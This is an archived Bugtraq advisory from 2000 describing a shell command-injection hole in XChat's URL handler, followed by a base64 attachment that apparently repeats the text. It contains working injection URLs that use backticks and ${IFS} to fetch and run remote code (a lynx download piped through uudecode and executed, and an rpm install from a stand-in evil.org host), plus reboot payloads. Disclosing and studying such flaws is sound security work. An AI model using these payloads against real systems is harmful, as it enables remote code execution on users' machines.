[16282] in bugtraq
XChat URL handler vulnerabilty
daemon@ATHENA.MIT.EDU (zenith parsec)
Fri Aug 18 01:51:51 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="=====================_889472414==_"
Message-Id: <20000817111940.2344.qmail@fiver.freemessage.com>
Date: Thu, 17 Aug 2000 11:19:40 -0000
Reply-To: zenith parsec <zenith_parsec@THE-ASTRONAUT.COM>
From: zenith parsec <zenith_parsec@THE-ASTRONAUT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
--=====================_889472414==_
Content-Type: text/plain; charset="us-ascii"
**********************************************************************
Email was sent to zed@linux.com (the author of xchat) and after over a week,
I have received no reply. So here it is... the advisory.
**********************************************************************
***************
***zen-parse*** - blinking since 1992 (or mebe earlier)
***************
X X CC H H AA TTTTT
X X C C H H A A T
X C HHHH AAAA T
X X C C H H A A T
X X CC H H A A T
Hole: backticked commands embedded in URLs vulnerabilty.
***********************************
* If you are lazy, read this part *
***********************************
Just to show what i mean about the possible danger, start Netscape and enter
in xchat, (in a channel or query window) the following URL.
http://this.should.work.com/cgi-bin/search.cgi?q='`lynx${IFS}-dump${IFS}http://homepages.ihug.co.nz/~Sneuro/thing|uudecode;./thingee`'
Right click on it, and select the Netscape (Existing) or Netscape (New Window)
option.
Wait until the URL loads.
In a shell on your machine type
tail -2 ~/.bash_profile
echo You've been hax0red
echo --zen
(oops... should've been You\'ve been hax0red, but u get the idea ;])
Lucky it wasn't a script that was well written, and designed to
use script kiddie stuff to hack root or something, eh?
**********************************************************************
**********************************************************************
For the non-lazy and the lazy who were impressed by the quick demo...
<advisory>
**********************************************************************
X-Chat has a feature which allows execution of code remotely
with the permissions of the user running it. (affects at least
versions <1.4.2, probably all versions.)
**********************************************************************
The hole is in the URL Handler section:
Netscape (Existing)
causes XChat to run the command
netscape -remote 'openURL(%s)'
where the %s is replaced by the selected URL
eg: http://homepages.ihug.co.nz/~Sneuro/
causes the command
netscape -remote 'openURL(http://homepages.ihug.co.nz/~Sneuro/)'
which opens that page.
Netscape (Run New)
causes XChat to run the command
netscape %s
and so on.
**************************
* The Hole *
**************************
Backticking and shell expansion. Imagine if someone types:
l00k @ d15 k3w1 w@r3z 5173! http://www.altavista.com/?x=`date`y='`date`'
with the (Existing) or (New Window) options and others that
use 'openURL(%s)' type commands to start the program, you get:
netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')'
count the 's and u will see that at the 2nd `date` they are closed,
and then reopened, so that `date` isn't escaped anymore... leaving it free to
run, which it does.
With the (Run New) type commands (that is command %s with no 's around
the %s) you get:
netscape http://www.altavista.com/?x=`date`y='`date`'
which has the 1st `date` unescaped (no 's around it) and so it executes.
In real life though, its unlikely anyone would click on a URL like
http://`reboot`/'`reboot`'
though. Still, not all that useful, I hear you tell me. Well, URLs can get
pretty long. For example, a cgi-bin call to somethng can get quite long.
http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10
compare that to:
http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1
quick glance... nothing wrong with it.
well, u seem to have a limitation, in that putting spaces in doesn't
work, nor does redirection.
well, u can put spaces in.The $IFS variable is probably set.
And who needs redirection, when u can do this:
http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"'
(For (Existing) or (New Window))
http://www.altavista.com/?"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"
(for (Run New))
(not hidden in anyway, but it could be obfuscated like the earlier example.)
(Also only works if someone is running as root, (which is *STUPID* idea
anyway) but the 1st example should've shown you a method around this)
anyway... the possibilities are endless ;)
-- zen-parse
</advisory>
ps:
greets to:
lamagra, omega, lockdown, grue, Mega, possem,
some other people i can't remember, the rest of #roothat,
and mebe even #social and umm... u, if I know u.
Send someone a cool Dynamitemail flashcard greeting!! And get rewarded.
GO AHEAD! http://cards.dynamitemail.com/index.php3?rid=fc-41
--=====================_889472414==_
Content-Type: text/plain; name="x-chat-url-executionything.txt"
Content-Transfer-Encoding: base64
Content-Description: x-chat-url-executionything.txt
Content-Disposition: attachment; filename="x-chat-url-executionything.txt"
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKgpFbWFpbCB3YXMgc2VudCB0byB6
ZWRAbGludXguY29tICh0aGUgYXV0aG9yIG9mIHhjaGF0KSBhbmQgYWZ0ZXIg
b3ZlciBhIHdlZWssCkkgaGF2ZSByZWNlaXZlZCBubyByZXBseS4gU28gaGVy
ZSBpdCBpcy4uLiB0aGUgYWR2aXNvcnkuCioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioKCioqKioqKioqKioqKioqKgoqKip6ZW4tcGFyc2UqKiogLSBibGlu
a2luZyBzaW5jZSAxOTkyIChvciBtZWJlIGVhcmxpZXIpCioqKioqKioqKioq
KioqKgoKWCAgIFggICBDQyAgIEggIEggICBBQSAgIFRUVFRUCiBYIFggICBD
ICBDICBIICBIICBBICBBICAgIFQKICBYICAgIEMgICAgIEhISEggIEFBQUEg
ICAgVAogWCBYICAgQyAgQyAgSCAgSCAgQSAgQSAgICBUClggICBYICAgQ0Mg
ICBIICBIICBBICBBICAgIFQKCkhvbGU6ICAgIGJhY2t0aWNrZWQgY29tbWFu
ZHMgZW1iZWRkZWQgaW4gVVJMcyB2dWxuZXJhYmlsdHkuCgoqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKgoqIElmIHlvdSBhcmUgbGF6eSwg
cmVhZCB0aGlzIHBhcnQgKgoqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKgoKSnVzdCB0byBzaG93IHdoYXQgaSBtZWFuIGFib3V0IHRoZSBw
b3NzaWJsZSBkYW5nZXIsIHN0YXJ0IE5ldHNjYXBlIGFuZCBlbnRlcgppbiB4
Y2hhdCwgKGluIGEgY2hhbm5lbCBvciBxdWVyeSB3aW5kb3cpIHRoZSBmb2xs
b3dpbmcgVVJMLiAKCmh0dHA6Ly90aGlzLnNob3VsZC53b3JrLmNvbS9jZ2kt
YmluL3NlYXJjaC5jZ2k/cT0nYGx5bngke0lGU30tZHVtcCR7SUZTfWh0dHA6
Ly9ob21lcGFnZXMuaWh1Zy5jby5uei9+U25ldXJvL3RoaW5nfHV1ZGVjb2Rl
Oy4vdGhpbmdlZWAnCgpSaWdodCBjbGljayBvbiBpdCwgYW5kIHNlbGVjdCB0
aGUgTmV0c2NhcGUgKEV4aXN0aW5nKSBvciBOZXRzY2FwZSAoTmV3IFdpbmRv
dykKb3B0aW9uLgoKV2FpdCB1bnRpbCB0aGUgVVJMIGxvYWRzLgpJbiBhIHNo
ZWxsIG9uIHlvdXIgbWFjaGluZSB0eXBlCgp0YWlsIC0yIH4vLmJhc2hfcHJv
ZmlsZQoKZWNobyBZb3UndmUgYmVlbiBoYXgwcmVkCmVjaG8gLS16ZW4gCgoo
b29wcy4uLiBzaG91bGQndmUgYmVlbiBZb3VcJ3ZlIGJlZW4gaGF4MHJlZCwg
YnV0IHUgZ2V0IHRoZSBpZGVhIDtdKQpMdWNreSBpdCB3YXNuJ3QgYSBzY3Jp
cHQgdGhhdCB3YXMgd2VsbCB3cml0dGVuLCBhbmQgZGVzaWduZWQgdG8KdXNl
IHNjcmlwdCBraWRkaWUgc3R1ZmYgdG8gaGFjayByb290IG9yIHNvbWV0aGlu
ZywgZWg/CioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKgoKRm9yIHRoZSBub24tbGF6eSBhbmQgdGhlIGxhenkg
d2hvIHdlcmUgaW1wcmVzc2VkIGJ5IHRoZSBxdWljayBkZW1vLi4uCgo8YWR2
aXNvcnk+CioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKIFgtQ2hhdCBoYXMg
YSBmZWF0dXJlIHdoaWNoIGFsbG93cyBleGVjdXRpb24gb2YgY29kZSByZW1v
dGVseSAKd2l0aCB0aGUgcGVybWlzc2lvbnMgb2YgdGhlIHVzZXIgcnVubmlu
ZyBpdC4gKGFmZmVjdHMgYXQgbGVhc3QKICAgICAgICB2ZXJzaW9ucyA8MS40
LjIsIHByb2JhYmx5IGFsbCB2ZXJzaW9ucy4pCioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioKClRoZSBob2xlIGlzIGluIHRoZSBVUkwgSGFuZGxlciBzZWN0
aW9uOgogICAgTmV0c2NhcGUgKEV4aXN0aW5nKSAgIApjYXVzZXMgWENoYXQg
dG8gcnVuIHRoZSBjb21tYW5kCiAgICBuZXRzY2FwZSAtcmVtb3RlICdvcGVu
VVJMKCVzKScgCndoZXJlIHRoZSAlcyBpcyByZXBsYWNlZCBieSB0aGUgc2Vs
ZWN0ZWQgVVJMCmVnOiBodHRwOi8vaG9tZXBhZ2VzLmlodWcuY28ubnovflNu
ZXVyby8KY2F1c2VzIHRoZSBjb21tYW5kIAogICAgbmV0c2NhcGUgLXJlbW90
ZSAnb3BlblVSTChodHRwOi8vaG9tZXBhZ2VzLmlodWcuY28ubnovflNuZXVy
by8pJwp3aGljaCBvcGVucyB0aGF0IHBhZ2UuIAogICAgTmV0c2NhcGUgKFJ1
biBOZXcpCmNhdXNlcyBYQ2hhdCB0byBydW4gdGhlIGNvbW1hbmQKICAgIG5l
dHNjYXBlICVzICAKYW5kIHNvIG9uLgoKKioqKioqKioqKioqKioqKioqKioq
KioqKioKKiAgICAgICBUaGUgSG9sZSAgICAgICAgICoKKioqKioqKioqKioq
KioqKioqKioqKioqKioKCkJhY2t0aWNraW5nIGFuZCBzaGVsbCBleHBhbnNp
b24uIEltYWdpbmUgaWYgc29tZW9uZSB0eXBlczoKCmwwMGsgQCBkMTUgazN3
MSB3QHIzeiAgNTE3MyEgaHR0cDovL3d3dy5hbHRhdmlzdGEuY29tLz94PWBk
YXRlYHk9J2BkYXRlYCcKCgp3aXRoIHRoZSAoRXhpc3RpbmcpIG9yIChOZXcg
V2luZG93KSBvcHRpb25zICBhbmQgb3RoZXJzIHRoYXQgCnVzZSAnb3BlblVS
TCglcyknIHR5cGUgY29tbWFuZHMgdG8gc3RhcnQgdGhlIHByb2dyYW0sIHlv
dSBnZXQ6CgogICAgbmV0c2NhcGUgLXJlbW90ZSAnb3BlblVSTChodHRwOi8v
d3d3LmFsdGF2aXN0YS5jb20vP3g9YGRhdGVgeT0nYGRhdGVgJyknCgpjb3Vu
dCB0aGUgJ3MgYW5kIHUgd2lsbCBzZWUgdGhhdCBhdCB0aGUgMm5kIGBkYXRl
YCB0aGV5IGFyZSBjbG9zZWQsCmFuZCB0aGVuIHJlb3BlbmVkLCBzbyB0aGF0
IGBkYXRlYCBpc24ndCBlc2NhcGVkIGFueW1vcmUuLi4gbGVhdmluZyBpdCBm
cmVlIHRvIApydW4sIHdoaWNoIGl0IGRvZXMuIAoKV2l0aCB0aGUgKFJ1biBO
ZXcpIHR5cGUgY29tbWFuZHMgKHRoYXQgaXMgIGNvbW1hbmQgJXMgIHdpdGgg
bm8gJ3MgYXJvdW5kCnRoZSAlcykgeW91IGdldDoKCiAgICBuZXRzY2FwZSBo
dHRwOi8vd3d3LmFsdGF2aXN0YS5jb20vP3g9YGRhdGVgeT0nYGRhdGVgJwoK
d2hpY2ggaGFzIHRoZSAxc3QgYGRhdGVgIHVuZXNjYXBlZCAobm8gJ3MgYXJv
dW5kIGl0KSBhbmQgc28gaXQgZXhlY3V0ZXMuCgpJbiByZWFsIGxpZmUgdGhv
dWdoLCBpdHMgdW5saWtlbHkgYW55b25lIHdvdWxkIGNsaWNrIG9uIGEgVVJM
IGxpa2UKCmh0dHA6Ly9gcmVib290YC8nYHJlYm9vdGAnIAoKdGhvdWdoLiBT
dGlsbCwgbm90IGFsbCB0aGF0IHVzZWZ1bCwgSSBoZWFyIHlvdSB0ZWxsIG1l
LiBXZWxsLCBVUkxzIGNhbiBnZXQKcHJldHR5IGxvbmcuIEZvciBleGFtcGxl
LCBhIGNnaS1iaW4gY2FsbCB0byBzb21ldGhuZyBjYW4gZ2V0IHF1aXRlIGxv
bmcuCgpodHRwOi8vd3d3LmFsdGF2aXN0YS5jb20vY2dpLWJpbi9xdWVyeT9w
Zz1xJnN0eXBlPXN0ZXh0JlRyYW5zbGF0ZT1vbiZzYz1vbiZxPSUyYnhjaGF0
KyUyYmJhY2t0aWNrKyUyYmV4cGxvaXQmc3RxPTEwCgpjb21wYXJlIHRoYXQg
dG86CgpodHRwOi8vd3d3LmFsdGF2aXN0YS5jb20vY2dpLWJpbi9xdWVyeT9w
Zz1xJnN0eXBlPXN0ZXh0JlRyYW5zbGF0ZT1vbiZzYz1vbiZxPSUyYnhjaGF0
KyUyYmByZWJvb3RgKyUyYmV4cGxvaXQmc3RxPTEwJmZpbHRlcj0nYHJlYm9v
dGAnJnVzZXI9YjBkZWUwMTMyJnNwbGl0PTEKCnF1aWNrIGdsYW5jZS4uLiBu
b3RoaW5nIHdyb25nIHdpdGggaXQuCgp3ZWxsLCB1IHNlZW0gdG8gaGF2ZSBh
IGxpbWl0YXRpb24sIGluIHRoYXQgcHV0dGluZyBzcGFjZXMgaW4gZG9lc24n
dCAKd29yaywgbm9yIGRvZXMgcmVkaXJlY3Rpb24uCgp3ZWxsLCB1IGNhbiBw
dXQgc3BhY2VzIGluLlRoZSAkSUZTIHZhcmlhYmxlIGlzIHByb2JhYmx5IHNl
dC4KQW5kIHdobyBuZWVkcyByZWRpcmVjdGlvbiwgd2hlbiB1IGNhbiBkbyB0
aGlzOgoKaHR0cDovL3d3dy5hbHRhdmlzdGEuY29tLz8nImBycG0ke0lGU30t
aSR7SUZTfWh0dHA6Ly9ldmlsLm9yZy9ldmlsLnJwbWAiJwoKKEZvciAoRXhp
c3RpbmcpIG9yIChOZXcgV2luZG93KSkKCmh0dHA6Ly93d3cuYWx0YXZpc3Rh
LmNvbS8/ImBycG0ke0lGU30taSR7SUZTfWh0dHA6Ly9ldmlsLm9yZy9ldmls
LnJwbWAiCgooZm9yIChSdW4gTmV3KSkKKG5vdCBoaWRkZW4gaW4gYW55d2F5
LCBidXQgaXQgY291bGQgYmUgb2JmdXNjYXRlZCBsaWtlIHRoZSBlYXJsaWVy
IGV4YW1wbGUuKQooQWxzbyBvbmx5IHdvcmtzIGlmIHNvbWVvbmUgaXMgcnVu
bmluZyBhcyByb290LCAod2hpY2ggaXMgKlNUVVBJRCogaWRlYQphbnl3YXkp
IGJ1dCB0aGUgMXN0IGV4YW1wbGUgc2hvdWxkJ3ZlIHNob3duIHlvdSBhIG1l
dGhvZCBhcm91bmQgdGhpcykKCmFueXdheS4uLiB0aGUgcG9zc2liaWxpdGll
cyBhcmUgZW5kbGVzcyA7KQoKLS0gemVuLXBhcnNlCjwvYWR2aXNvcnk+Cgpw
czoKZ3JlZXRzIHRvOgpsYW1hZ3JhLCBvbWVnYSwgbG9ja2Rvd24sIGdydWUs
ICBNZWdhLCBwb3NzZW0sIApzb21lIG90aGVyIHBlb3BsZSBpIGNhbid0IHJl
bWVtYmVyLCB0aGUgcmVzdCBvZiAjcm9vdGhhdCwgCmFuZCBtZWJlIGV2ZW4g
I3NvY2lhbCBhbmQgdW1tLi4uIHUsIGlmIEkga25vdyB1LgoK
--=====================_889472414==_--
